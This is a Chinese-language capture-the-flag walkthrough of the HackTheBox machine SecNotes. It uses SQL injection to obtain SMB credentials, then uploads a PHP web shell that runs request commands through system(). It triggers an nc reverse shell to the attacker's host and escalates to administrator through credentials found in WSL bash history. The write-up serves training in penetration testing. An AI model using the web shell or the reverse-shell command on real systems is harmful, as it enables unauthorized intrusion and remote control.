这次靶机是hackthebox里的SecNotes
靶机IP地址:10.10.10.97
==========================================================================================
信息收集
nmap -sV -sC -T5 10.10.10.97
发现靶机开放了80端口和445端口
访问下80端口
是一个登陆页面,我们点击【Sign up now】来注册下账号,并登陆
登陆后,我们遇到一堆按钮,一个警告(个人信息泄露),同时也显示了我们的用户名
这里我们可以试着 CSRF,XSS,SQL注入等这些安全问题
我们试着SQL注入,我们重新回到账号注册页面
重新注册一个账号
进入页面时候,跳出一个窗口和一堆数据,说明是存在SQL注入的
其他的信息都不是很重要,重要的是这个【New Site】
靶机开了SMB服务,这个应该就是账号和密码了
使用smbclient登陆
smbclient //10.10.10.97/new-site -U "tyler"
用户名:tyler
密码:92g!mA8BGjOirkL%OG*&
我们查看下共享的内容
看到一些跟网页有关的东西,但是似乎是跟我们从80上看到的内容是不一样的
我们试着从把全部端口扫描下看看,
我们访问下8808
是一个iis默认的页面
查看源码,我们也可以看到它引用的就是smb列出里面的png图片
然后我们通过上传一个php反弹shell
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
die;
}
?>
然后我们put rec.php
我们还要put个nc上去
在我们的Kali上要监听端口
然后访问10.10.10.97:8808/rec.php?cmd=nc.exe 10.10.10.15.xx 4444 -e cmd.exe
得到shell
然后我们 切换到 用户目录下dir下
type下得到user flag
在刚刚dir我们发现一个很有趣的东西 bash.link
一个链接
这台机器上装了linux的子系统,我们找下bash的具体位置
我们cd 到Windows目录下用dir查找下
dir *.exe /b/s | findstr bash
/b:不显示修改日期等信息,只显示文件名
/s:显示指定目录和所有子目录中的文件
我们cd过去然后执行bash.exe
我们用python pty得到一个稳定的shell
python -c "import pty;pty.spawn('/bin/bash')"
我们查看下.bash_history的内容
我们得到了管理员的smb账号密码,然后我们登录下
我们一步步cd到root的Desktop然后dir发现root.txt
然后get root.txt 最后退出smb服务 读取刚刚获取的root.txt的文件内容